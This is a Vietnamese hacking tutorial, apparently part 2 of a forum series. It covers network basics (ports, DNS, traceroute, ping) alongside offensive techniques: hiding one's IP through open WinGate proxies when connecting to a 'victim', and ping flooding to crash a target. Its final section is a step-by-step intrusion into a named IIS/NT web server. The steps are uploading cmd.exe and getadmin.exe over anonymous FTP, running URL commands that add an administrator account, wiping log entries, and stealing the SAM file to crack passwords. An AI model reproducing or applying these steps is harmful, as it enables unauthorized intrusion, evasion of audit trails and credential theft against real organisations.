Vitual port ( cổng ảo ) là 1 số
tự nhiên đựợc gói ở trong TCP(Tranmission Control Protocol)
và UDP(User Diagram Protocol) header. Như mọi nguòi đã biết,
Windows có thể chạy nhiều chương trình 1 lúc, mỗi chương
trình này có 1 cổng riêng dùng để truyền và nhận dữ liệu.
Ví dụ 1 máy có địa chỉ IP là 127.0.0.1
chạy WebServer, FTP_Server, POP3 server, etc, những dịch vụ
này đều đuọc chạy trên 1 IP address là 127.0.0.1, khi một
gói tin đuọc gửi đến làm thế nào máy tính của chúng ta phân
biệt được gói tin này đi vào dịch vụ nào WebServer hay FTP
server hay SM! TP? Chính vì thế Port xuất hiện. Mỗi dịch vụ
có 1 số port mặc định, ví dụ FTP có port mặc định là 21, web
service có port mặc định là 80, POP3 là 110, SMTP là 25 vân
vân....
Người quản trị mạng có thể thay đổi số port
mặc định này, nếu bạn ko biết số port trên một máy chủ, bạn
ko thể kết nối vào dịch vụ đó được. Chắc bạn đã từng nghe
nói đến PORT MAPPING nhưng có lẽ chưa biết nó là gì và chức
năng thế nào. Port mapping thực ra đơn giản chỉ là quá trình
chuyển đổi số port mặc định của một dịch vụ nào đó đến 1 số
khác. Ví dụ Port mặc định của WebServer là 80, nhưng thỉnh
thoảng có lẽ bạn vẫn thấy
http://www.xxx.com:8080 , 8080 ở đây chính là số port
của host xxx nhưng đã đuợc nguòi quản trị của host này
``map`` từ 80 thành 8080.
( Tài liệu của HVA )
15 . ) DNS là gì ?
_ DNS là viết tắt của Domain Name System. Một máy chủ DNS
đợi kết nối ở cổng số 53, có nghĩa là nếu bạn muốn kết nối
vào máy chủ đó, bạn phải kết nối đến cổng số 53. Máy chủ
chạy DNS chuyển hostname bằng các chữ cái thành các chữ số
tương ứng và ngược lại. Ví dụ: 127.0.0.1 -- > localhost và
localhost--- > 127.0.0.1 .
( Tài liệu của HVA )
16 . ) Đôi điều về Wingate :
_ WinGate là một chương trình đơn giản cho phép bạn chia các
kết nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với 2 hoặc
nhiều máy . WinGate dùng với nhiều proxy khác nhau có thể
che giấu bạn .
_ Làm sao để Wingate có thể che dấu bạn ? Hãy làm theo tôi :
Bạn hãy telnet trên cổng 23 trên máy chủ chạy WinGate telnet
proxy và bạn sẽ có dấu nhắc WinGate > . Tại dấu nhắc này bạn
đánh vào tên server, cùng một khoảng trống và cổng bạn muốn
kết nối vào. VD :
CODE
telnet wingate.net
WinGate > victim.com 23
ta telnet đến cổng 23 vì đây là cổng mặc định khi bạn cài
Wingate . lúc này IP trên máy mà victim chộp được của ta là
IP của máy chủ chứa Wingate proxy đó .
_ Làm sao để tìm Wingate ?
+ Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) thì đến
yahoo hay một trang tìm kiếm cable modem. Tìm kiếm cable
modems vì nhiều người dùng cable modems có WinGate để họ có
thể chia sẻ đường truyền rộng của nó cable modems cho những
máy khác trong cùng một nhà . Hoặc bạn có thể dùng Port hay
Domain scanners và scan Port 1080 .
+ Để tìm IP động (IP thay đổi mỗi lần user kết nối vào
internet) của WinGates bạn có thể dùng Domscan hoặc các
chương trình quét khác . Nếu dùng Domscan bạn hãy nhập
khoảng IP bất kỳ vào box đầu tiên và số 23 vào box thứ 2 .
Khi đã có kết quả , bạn hãy thử lần lượt telnet đến các địa
chỉ IP tìm đựơc ( đã hướng dẫn ở trên ), nếu nó xuất hiện
dấu “Wingate > ” thì bạn đã tìm đúng máy đang sử dụng
Wingate rồI đó .
+ Theo kinh nghiệm của tôi thì bạn hãy down wingatescanner
về mà sài , nó có rất nhièu trên mạng .
17 . ) Đôi điều về Traceroute :
_ Traceroute là một chương trình cho phép bạn xác định được
đường đi của các gói packets từ máy bạn đến hệ thống đích
trên mạng Internet.
_ bạn hãy xem VD sau :
CODE
C:\windows > tracert 203.94.12.54
Tracing route to 203.94.12.54 over a maximum of 30 hops
1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185
ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159
ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
Tôi cần biết đường đi từ máy tôi đến một host trên mạng
Internet có địa chỉ ip là 203.94.12.54. Tôi cần phải tracert
đến nó! Như bạn thấy ở trên, các gói packets từ máy tôi muốn
đến được 203.94.12.54 phải đi qua 13 hops(mắc xích) trên
mạng. Đây là đưòng đi của các gói packets .
_ Bạn hãy xem VD tiếp theo :
CODE
host2 # traceroute xyz.com
traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte
packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms
+ Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống
đích. Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và
kích thước của datagram là 40 bytes(20-bytes IP Header +
8-bytes UDP Header + 12-bytes user data).
+ Dòng thứ 2 cho biết router đầu tiên nhận được datagram là
202.xy.34.12, giá trị của TTL khi gởi đến router này là 1.
Router này sẽ gởi trở lại cho chương trình traceroute một
ICMP message error ``Time Exceeded``. Traceroute sẽ gởi tiếp
một datagram đến hệ thống đích.
+ Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có
TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy
nhiên, xyz.com không phải là một router, nó sẽ gởi trở lại
cho traceroute một ICMP error message ``Port Unreachable``.
Khi nhận được ICMP message này, traceroute sẽ biết được đã
đến được hệ thống đích xyz.com và kết thúc nhiệm vụ tại đây.
+ Trong trường hợp router không trả lời sau 5 giây,
traceroute sẽ in ra một dấu sao ``*``(không biết) và tiếp
tục gởi datagram khác đến host đích!
_Chú ý:
Trong windows: tracert hostname
Trong unix: traceroute hostname
( Tài liệu của viethacker.net )
18 . ) Ping và cách sử dụng :
_ Ping là 1 khái niệm rât đơn giản tuy nhiên rất hữu ích cho
việc chẩn đoán mạng. Tiểu sử của từ ``ping`` như sau: Ping
là tiếng động vang ra khi 1 tàu ngầm muốn biết có 1 vật thể
khác ở gần mình hay ko, nếu có 1 vật thể nào đó gần tàu ngầm
tiếng sóng âm này sẽ va vào vật thể đó và tiếng vang lại sẽ
là ``pong`` vậy thì tàu ngầm đó sẽ biết là có gì gần mình.
_Trên Internet, khái niệm Ping cũng rất giống với tiểu sử
của nó như đã đề cập ở trên. Lệnh Ping gửi một gói ICMP
(Internet Control Message Protocol) đến host, nếu host đó
``pong`` lại có nghĩa là host đó tồn tại (hoặc là có thể với
tới đựoc). Ping cũng có thể giúp chúng ta biêt được luợng
thời gian một gói tin (data packet) đi từ máy tính của mình
đến 1 host nào đó.
_Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ ``ping
địa_chỉ_ip``, mặc định sẽ ping 4 lần, nhưng bạn cũng có thể
gõ
CODE
``ping ip.address -t``
Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping
làm như sau:
CODE
``ping -l (size) địa_chỉ_ip ``
Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem
xem mất bao lâu gói tin rồi xem xem sau bao lâu gói tin đó
quay trở lại, cách này xác định được tốc độ của kết nối, và
thời gian cần để một gói tin đi và quay trở lại và chia bốn
(gọi là ``trip time``). Ping cũng có thể được dùng để làm
chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows 98 treo
sau một phút lụt ping (Bộ đệm của kết nối bị tràn – có qua
nhiều kết nối, nên Windows quyết định cho nó đi nghỉ một
chút). Một cuộc tấn công “ping flood” sẽ chiếm rất nhiều
băng thông của bạn, và bạn phải có băng thông lớn hơn đối
phương ( trừ khi đối phương là một máy chạy Windows 98 và
bạn có một modem trung bình, bằng cách đó bạn sẽ hạ gục đối
phương sau xấp xỉ một phút lụt ping). Lụt Ping không hiệu
quả lắm đổi với những đối phương mạnh hơn một chút. trừ khi
bạn có nhiều đường và bạn kiểm soát một số lượng tương đối
các máy chủ cùng ping mà tổng băng thông lơn hơn đối phương.
Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ ping
mục tiêu một cách liên tục, với những khoảng ngắt quãng giữa
hai lần ping liên tiếp. Trong tất cả các hệ Unix hoặc Linux,
bạn có thể dùng ping -f để gây ra lụt thực sự. Thực tế là
phải ping -f nếu bạn dùng một bản tương thích POSIX (POSIX -
Portable Operating System Interface dựa trên uniX), nếu
không nó sẽ không phải là một bản Unix/Linux thực sự, bởi
vậy nếu bạn dùng một hệ điều hành mà nó tự cho nó là Unix
hay Linux, nó sẽ có tham số -f.
( Tài liệu của HVA và viethacker.net )
19 . ) Kỹ thuật xâm nhập Window NT
từ mạng Internet :
_ Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu
nghiên cứu về hack , bây giờ tôi sẽ bày lại cho các bạn .
bạn sẽ cần phảI có một số thờI gian để thực hiện được nó vì
nó tuy dễ nhưng khó . Ta sẽ bắt đầu :
_ Đầu tiên bạn cần tìm một server chạy IIS :
_ Tiếp đến bạn vào DOS và đánh ` FTP `. VD :
c:\Ftp
www.dodgyinc.com
( trang naỳ khi tôi thực hành thì vẫn còn làm được , bây giờ
không biết họ đã fix chưa , nếu bạn nào có trang nào khác
thì hãy post lên cho mọI ngườI cùng làm nhé )
Nếu connect thành công , bạn sẽ thấy một số dòng tương tự
như thế này :
CODE
Connected to
www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):
Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng
, nó cho ta biết tên Netbios của máy tính là “ Vdodgy ” . Từ
điều này bạn có thể suy diễn ra tên mà được sử dụng cho NT
để cho phép ta có thể khai thác , mặc định mà dịch vụ FTP
gán cho nó nếu nó chưa đổi tên sẽ là “IUSR_VDODGY” . Hãy nhớ
lấy vì nó sẽ có ích cho ta . Nhập ``anonymous” trong user nó
sẽ xuất hiện dòng sau :
CODE
331 Anonymous access allowed, send identity (e-mail name) as
password.
Password:
Bây giờ passwd sẽ là bất cứ gì mà ta chưa biết , tuy nhiên ,
bạn hãy thử đánh vào passwd là “anonymous” . Nếu nó sai ,
bạn hãy log in lạI thiết bị FTP , bạn hãy nhớ là khi ta quay
lạI lần này thì không sử dụng cách mạo danh nữa ( anonymous
) mà sử dụng “`Guest” , thử lại passwd với “guest” xem thế
nào .
Bây giờ bạn hãy đánh lệnh trong DOS :
CODE
Cd /c
Và sẽ nhìn thấy kết quả nếu như bạn đã xâm nhập thành công ,
bây giờ bạn hãy nhanh chóng tìm thư mục `cgi-bin` . Nếu như
bạn may mắn , bạn sẽ tìm được dễ dàng vì thông thường hệ
thống quản lý đã đặt `cgi-bin` vào nơi mà ta vừa xâm nhập để
cho các ngườI quản lý họ dễ dàng điều khiển mạng hơn . thư
mục cgi-bin có thể chứa các chương trình mà bạn có thể lợi
dụng nó để chạy từ trình duyệt Web của bạn . Ta hãy bắt đầu
“quậy” nào greenbiggrin.gif greenbiggrin.gif .
_ Đầu tiên , bạn hãy chuyển tớ thư mục cgi-bin và sử dụng
lệnh “Binary” ( có thể các bạn không cần dùng lệnh này ) ,
sau đó bạn dánh tiếp lệnh “put cmd.exe” . Tiếp theo là bạn
cần có file hack để cài vào thư mục này , hãy tìm trên mạng
để lấy 2 file quan trọng nhất đó là `getadmin.exe` và `gasys.dll`
. Download chúng xuống , một khi bạn đã có nó hãy cài vào
trong thư mục cgi-bin . Ok , coi như mọI việc đã xong , bạn
hãy đóng cửa sổ DOS .
Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn :
http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?IUSR_VDODGY
Sau vài giây bạn sẽ có được câu trả lời như ở dướI đây :
CODE
CGI Error
The specified CGI application misbehaved by not returning a
complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator
rights!
Thế là bạn đã mạo danh admin để xâm nhập hệ thống , việc cần
thiết bây giờ là bạn hãy tự tạo cho mình một account , hãy
đánh dòng sau trên IE :
http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2
0hacker%20toilahacker%20/add
dòng lệnh trên sẽ tạo cho bạn một account login với user :
anhdenday và passwd : toilahackerBây giờ bạn hãy là cho user
này có account của admin , bạn chỉ cần đánh lên IE lệnh :
http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?anhdenday
Vậy là xong rùi đó , bạn hãy disconnect và đến start menu -
> find rồi search computer `www.dodgyinc.com`. Khi tìm thấy
, bạn vào explore , explore NT sẽ mở ra bạn hay nhập user và
passwd để mở nó ( của tôi là user : anhdenday và passwd :
toilahacker ) .
Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi
lại , do đó để xoá dấu vết bạn hãy vào `Winnt\system32\logfiles`
mở file log đó rồI xoá những thông tin liên quan đến bạn ,
rồI save chúng . Nếu bạn muốn lấy một thông báo gì về việc
chia sẽ sự xâm nhập thì bạn hãy thay đổi ngày tháng trên máy
tính vớI URL sau :
http://www.dodgyinc.com/cgi-bin/cm
d.exe?/c%20date%2030/04/03
xong rồI bạn hãy xoá file `getadmin.exe`, và `gasys.dll` từ
`cgi-bin` . Mục đích khi ta xâm nhập hệ thống này là “chôm”
pass của admin để lần sau xâm nhập một cách hợp lệ , do đó
bạn hãy tìm file SAM ( chứa pass của admin và member ) trong
hệ thống rồI dùng chương trình “l0pht crack” để crack pass (
Hướng dẫn về cách sử dụng “l0pht crack v 3.02” tôi đã post
lên rồi ,các bạn hãy tự nghiên cứu nhé ) . Đây là link :
http://vnhacker.org/forum/?act=ST& f=6&t=11566&s=
Khi crack xong các bạn đã có user và pass của admin rồI ,
bây giờ hãy xoá account của user ( của tôi là “anhdenday” )
đi cho an toàn . Bạn đã có thể làm gì trong hệ thống là tuỳ
thích , nhưng các bạn đừng xoá hết tài liệu của họ nhé , tội
cho họ lắm .
Bạn cảm thấy thế nào , rắc rối lắm phải không . Lúc tôi thử
hack cách này , tôi đã mày mò mất cả 4 giờ , nếu như bạn đã
quen thì lần thứ 2 bạn sẽ mất ít thờI gian hơn .
Ở phần 3 tôi sẽ đề cập đến HĐH Linux , đến cách ngắt mật
khẩu bảo vệ của một Web site , và làm thế nào để hack một
trang web đơn giản nhất .v.v…
Hết phần 2
Tác giả: Anhdenday - HVAonline